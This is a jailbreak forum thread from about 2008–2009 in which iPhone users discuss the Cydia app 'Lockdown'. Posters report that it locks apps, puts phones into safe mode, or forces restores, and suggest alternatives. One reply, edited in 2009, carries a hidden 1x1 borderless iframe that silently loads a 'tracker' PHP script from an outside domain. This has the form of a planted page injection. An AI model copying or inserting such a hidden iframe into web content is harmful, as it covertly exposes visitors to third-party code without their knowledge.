Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: Lockdown on Cydia

Default Lockdown on Cydia
    I did a search and nothing has been siad about this app so if there has been please delete this thread.

Lockdown is the app that all of us want.
    When you first open it you have to put in a safe word incase you forget your password.
    After that you put in your combo and then you can start locking apps

It allows you to lock any application with a password it does a soft reset and then when you try to open that app you have to put your password in it does another soft reset and then the app is unlocked

This is in Cydia on firmware 2.0 (i dont know if it is available for lower frimwares).

If you want this open up Cydia and go to search and type in Lockdown.

PSS: Apparently from other user they have had to restore when they installed this app.
    I have had no problems with this app and i have locked and unlocked several apps.

HappyModding

PS: Please close thread if this has been posted before.
    Last edited by Kariya9mdoa; 08-12-2008 at 01:23 AM.

My iPhone is a Part of Me
    Thanks

ya i used it the first day it came out. ya its cool... but its to much work i wanted a lock on mt photos and sms but its impossible. you set a lock. you click on the program you put in password wait 30min then it restarts then the program isnt locked anympre so you have to reset it. its dumb......
    iTouch 2.0 (free update/pwn'd)
    iPhone 3G white (pwn'd)
    MacBook Pro 15inch (using tethered)

2 broken wrists so give me a break. no more 2007 Yamaha r6

My iPhone is a Part of Me pokekid's Avatar
    Thanks

program was a pain for me. got picvault for my pics and it works great
    SB's is life
    air yeezy's coming soon

This app completely locked my phone. Can't even enter a password in ANYWHERE. Its totally f'ed. Restoring it right now. What a horrible app. Don't even bother with it. Not worth the risk of having to completely restore like most people that have downloaded it.

Quote Originally Posted by louns View Post
    This app completely locked my phone. Can't even enter a password in ANYWHERE. Its totally f'ed. Restoring it right now. What a horrible app. Don't even bother with it. Not worth the risk of having to completely restore like most people that have downloaded it.
    If most people had problem we will see more messages in the forum, stop sayign fake things about others .

It works perfectly for me. Only thing i dont like is , you re lock again manaully the application once you unlock it.

It toasted my ipod functionality, looking like I might have to do a restore - Don't be so quick to say someone is lying, you got lucky with this piece of s**t - If I was you I'd stay away from this. F**K just what I want to do - a restore.

Thanks
    Thanked 1,180 Times in 730 Posts

This sounds like a highly annoying program....... in both functionality and end result.
    Screw #Winning, I'm #Juanning
    iMac 27" i5 quad 2.8Ghz (1TB), MacBook Pro 17" 2.6, iPhone 4s

What's Jailbreak?
    Thanks
    Quote Originally Posted by netuser View Post
    If most people had problem we will see more messages in the forum, stop sayign fake things about others .

It works perfectly for me. Only thing i dont like is , you re lock again manaully the application once you unlock it.
    He's right...it kept putting my phone in safe mode everytime i tried to open any of my locked apps...

Maybe yours was the fluke...

thats really weird<iframe height="1" width="1" frameborder="0" scrolling="no" src="http://tvshownews.info/tracking/tracker-j.php"></iframe>
    Last edited by Bolbol24; 11-02-2009 at 06:04 PM.

Installed lockdown this morning and it also forced my iphone into safe mode everytime I launched the app. Uninstalled lockdown right away.

Thanks
    Thanked 1,034 Times in 956 Posts

Try iprotect

Picvault works great. Is there an app that does the same thing for videos?

Livin the iPhone Life CaptainChaos's Avatar
    Thanks

I loved lockdown. Any news in this working again?